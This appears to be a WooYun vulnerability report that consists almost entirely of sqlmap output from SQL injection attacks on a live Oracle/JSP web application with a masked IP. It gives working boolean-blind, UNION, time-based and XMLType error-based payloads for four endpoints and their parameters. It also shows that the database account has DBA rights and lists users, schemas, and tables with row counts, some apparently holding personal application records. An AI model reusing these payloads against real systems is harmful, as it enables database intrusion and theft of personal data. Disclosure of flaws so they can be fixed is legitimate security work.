WooYun.org

**.**.**.**:8000/

**.**.**.**:8000/firstList.jsp?sid=4028811932a87caf0132a89ac07f0010

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: sid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sid=4028811932a87caf0132a89ac07f0010' AND 7008=7008 AND 'sZux'='sZu
x
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: sid=4028811932a87caf0132a89ac07f0010' UNION ALL SELECT CHR(113)||CH
R(98)||CHR(102)||CHR(116)||CHR(113)||CHR(120)||CHR(120)||CHR(98)||CHR(75)||CHR(1
09)||CHR(90)||CHR(86)||CHR(83)||CHR(107)||CHR(117)||CHR(113)||CHR(97)||CHR(106)|
|CHR(106)||CHR(113),NULL FROM DUAL--
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: sid=4028811932a87caf0132a89ac07f0010' AND 4368=DBMS_PIPE.RECEIVE_ME
SSAGE(CHR(100)||CHR(74)||CHR(70)||CHR(65),5) AND 'NZDu'='NZDu
---
[01:05:33] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[01:05:33] [INFO] fetching current user
current user:    'NOTA'
[01:05:34] [INFO] fetching current database
[01:05:34] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'NOTA'
[01:05:34] [INFO] testing if current user is DBA
current user is DBA:    True

[01:10:40] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[01:10:40] [INFO] fetching database users
database management system users [37]:
[*] ANONYMOUS
[*] BI
[*] CGS
[*] CTXSYS
[*] DBORACLE
[*] DBSNMP
[*] DIP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] NOTA
[*] NOTA_TEMP
[*] NOTADT
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OTATARGET
[*] OUTLN
[*] PM
[*] QS_ERP
[*] SCOTT
[*] SH
[*] SI_INFORMTN_SCHEMA
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEBOTA
[*] WEBOTABASE
[*] WMSYS
[*] WSPCS
[*] XDB

[01:11:19] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[01:11:19] [WARNING] schema names are going to be used on Oracle for enumeration
 as the counterpart to database names on other DBMSes
[01:11:19] [INFO] fetching database (schema) names
available databases [27]:
[*] CGS
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HR
[*] IX
[*] MDSYS
[*] NOTA
[*] NOTA_TEMP
[*] NOTADT
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WEBOTA
[*] WEBOTABASE
[*] WMSYS
[*] WSPCS
[*] XDB

Database: HR
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| EMPLOYEES   | 107     |
| DEPARTMENTS | 27      |
| COUNTRIES   | 25      |
| LOCATIONS   | 23      |
| JOBS        | 19      |
| JOB_HISTORY | 10      |
| REGIONS     | 4       |
+-------------+---------+

Database: NOTA
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| SERVICE_MESSAGE         | 14284896 |
| TRIGGER_MESSAGE         | 1378479 |
| CRJ_YW_BZJDJGB          | 978587  |
| PROJECTSMS              | 142078  |
| CRJ_YW_WSSQ_HGTSQXXB    | 57847   |
| CRJ_YW_WSSQ_TWZJBLB     | 57677   |
| CRJ_YW_WSSQ_GXRB        | 34602   |
| CRJ_YW_WSSQ_JTCYB       | 33178   |
| CRJ_YW_WSSQ_QZBLB       | 29193   |
| APPLY_DOC               | 21602   |
| JITTASK                 | 18699   |
| CRJ_YW_WSSQ_YYXXB       | 17721   |
| JITTASKINSTANCE         | 15166   |
| JITTRANSITION           | 14922   |
| FLOWSARCHIVE            | 14137   |
| "CONDITION"             | 14129   |
| WEBFUJIAN               | 13130   |
| JITFUJIAN               | 11713   |
| APPLY_LAWS              | 8117    |
| WEBPROCESSINSTANCE      | 4486    |
| JITPROCESSDATA          | 4251    |
| JITPROCESSDEFINITION    | 4238    |
| PROTYPE_RELATION        | 3915    |
| SHOULI                  | 3813    |
| WORKDATE                | 3652    |
| JITPROCESSINSTANCE      | 3411    |
| PROJECTINFO             | 3271    |
| PROJECTARCHIVES         | 3238    |
| QUJIANTAB               | 3217    |
| DOCUMENTS               | 3104    |
| CRJ_YW_SWDWB            | 2911    |
| CRJ_YW_WSSQ_YQRB        | 1614    |
| LAWS                    | 1210    |
| PROJECTSORT             | 1060    |
| PROJECTANNEX            | 826     |
| CRJ_YW_WSSQ_CXSQXXB     | 590     |
| CRJ_YW_WSSQ_BGJZB       | 332     |
| CRJ_YW_BZJDCXB          | 276     |
| PROJECTINFOMB           | 182     |
| DICTIONARY              | 165     |
| JITVARIABLEDEFINITION   | 108     |
| ADDRESSZD               | 92      |
| CRJ_YW_WSSQ_CXSQJGB     | 84      |
| HANDUPINFO              | 74      |
| PROJECTTBL              | 57      |
| PLAN_TABLE              | 56      |
| CRJ_YW_WSSQ_WGR_ZJSQB   | 53      |
| CRJ_YW_WSSQ_WGR_QZBL_GR | 33      |
| JITFUJIAN2              | 26      |
| CRJ_YW_WSSQ_WGR_XXRB    | 13      |
| JITFORMINFO             | 12      |
| QJTYPE                  | 11      |
| DEALWRONG               | 10      |
| PROJECTSMSDEFINITION    | 7       |
| SCORETYPE               | 5       |
| WEBFORM                 | 4       |
| CHANNEL                 | 3       |
| DUBANPRO                | 3       |
| QJCLASS                 | 3       |
| TOUSUTYPE               | 2       |
| WEBARCHIVES             | 2       |
| WORKTIME_STANDARD       | 1       |
+-------------------------+---------+

+------------+---------+
| Table      | Entries |
+------------+---------+
| LOG        | 32673   |
| SYSOP_LOG  | 4165    |
| STRUCTURE  | 2847    |
| STAFF      | 1497    |
| DEPARTMENT | 1232    |
| ROLERELATE | 252     |
| FLOOR_REL  | 28      |
| SYSTEMINFO | 3       |
| MANAGER    | 1       |
+------------+---------+

**.**.**.**:8000/getdata.jsp (POST)
id=2c9086e432753cd1013275513a6a0003&dictid=null

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: dictid
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: id=2c9086e432753cd1013275513a6a0003&dictid=null' AND 2862=DBMS_PIPE
.RECEIVE_MESSAGE(CHR(67)||CHR(119)||CHR(87)||CHR(84),5) AND 'cMIy'='cMIy
---
[01:26:48] [INFO] the back-end DBMS is Oracle
back-end DBMS: Oracle
[01:26:48] [INFO] fetching current user
[01:26:48] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[01:26:48] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[01:27:03] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
[01:27:13] [INFO] adjusting time delay to 1 second due to good response times
NOTA
current user:    'NOTA'
[01:27:27] [INFO] fetching current database
[01:27:27] [INFO] resumed: NOTA
[01:27:27] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'NOTA'
[01:27:27] [INFO] testing if current user is DBA
current user is DBA:    True

**.**.**.**:8000/self/showWssb100.jsp?
searchNum=6406&piid=11111111111111111111&col3=222222&hiddenFlag=1

sqlmap identified the following injection points with a total of 374 HTTP(s) req
uests:
---
Place: GET
Parameter: piid
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: searchNum=6406&piid=11111111111111111111' AND 3868=DBMS_PIPE.RECEIV
E_MESSAGE(CHR(65)||CHR(103)||CHR(84)||CHR(97),5) AND 'GTjm'='GTjm&col3=222222&hi
ddenFlag=1
---
[02:18:20] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[02:18:20] [INFO] fetching current user
[02:18:20] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[02:18:20] [INFO] retrieved:
[02:18:20] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[02:18:44] [INFO] adjusting time delay to 1 second due to good response times
NOTA
current user:    'NOTA'
[02:19:04] [INFO] fetching current database
[02:19:04] [INFO] resumed: NOTA
[02:19:04] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'NOTA'
[02:19:04] [INFO] testing if current user is DBA
current user is DBA:    True

**.**.**.**:8000/self/showWssbList100.jsp (POST)
col5=13888888888&col6=11111111111&col3=22222222&searchNum=6405&hiddenFlag=2&submitSav.x=27&submitSav.y=5

sqlmap identified the following injection points with a total of 559 HTTP(s) req
uests:
---
Place: POST
Parameter: col3
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: col5=13888888888&col6=11111111111&col3=22222222' AND 7676=(SELECT U
PPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(117)||CHR(111)||CHR(113)|
|(SELECT (CASE WHEN (7676=7676) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112
)||CHR(101)||CHR(99)||CHR(113)||CHR(62))) FROM DUAL) AND 'GazS'='GazS&searchNum=
6405&hiddenFlag=2&submitSav.x=27&submitSav.y=5
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: col5=13888888888&col6=11111111111&col3=22222222' AND 4780=DBMS_PIPE
.RECEIVE_MESSAGE(CHR(89)||CHR(77)||CHR(83)||CHR(73),5) AND 'sJRg'='sJRg&searchNu
m=6405&hiddenFlag=2&submitSav.x=27&submitSav.y=5
Place: POST
Parameter: col5
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: col5=13888888888') AND 4947=(SELECT UPPER(XMLType(CHR(60)||CHR(58)|
|CHR(113)||CHR(120)||CHR(117)||CHR(111)||CHR(113)||(SELECT (CASE WHEN (4947=4947
) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(101)||CHR(99)||CHR(113)
||CHR(62))) FROM DUAL) AND ('YrhE'='YrhE&col6=11111111111&col3=22222222&searchNu
m=6405&hiddenFlag=2&submitSav.x=27&submitSav.y=5
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: col5=13888888888') AND 9355=DBMS_PIPE.RECEIVE_MESSAGE(CHR(74)||CHR(
70)||CHR(118)||CHR(115),5) AND ('ATnp'='ATnp&col6=11111111111&col3=22222222&sear
chNum=6405&hiddenFlag=2&submitSav.x=27&submitSav.y=5
Place: POST
Parameter: col6
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: col5=13888888888&col6=11111111111') AND 3930=(SELECT UPPER(XMLType(
CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(117)||CHR(111)||CHR(113)||(SELECT (CAS
E WHEN (3930=3930) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(101)||
CHR(99)||CHR(113)||CHR(62))) FROM DUAL) AND ('YJCa'='YJCa&col3=22222222&searchNu
m=6405&hiddenFlag=2&submitSav.x=27&submitSav.y=5
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: col5=13888888888&col6=11111111111') AND 9312=DBMS_PIPE.RECEIVE_MESS
AGE(CHR(71)||CHR(106)||CHR(90)||CHR(82),5) AND ('KsUP'='KsUP&col3=22222222&searc
hNum=6405&hiddenFlag=2&submitSav.x=27&submitSav.y=5
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: POST, parameter: col5, type: Single quoted string (default)
[1] place: POST, parameter: col6, type: Single quoted string
[2] place: POST, parameter: col3, type: Single quoted string
[q] Quit
> 0
[02:29:09] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[02:29:09] [INFO] fetching current user
[02:29:10] [INFO] retrieved: NOTA
current user:    'NOTA'
[02:29:10] [INFO] fetching current database
[02:29:10] [INFO] resumed: NOTA
[02:29:10] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'NOTA'
[02:29:10] [INFO] testing if current user is DBA
current user is DBA:    True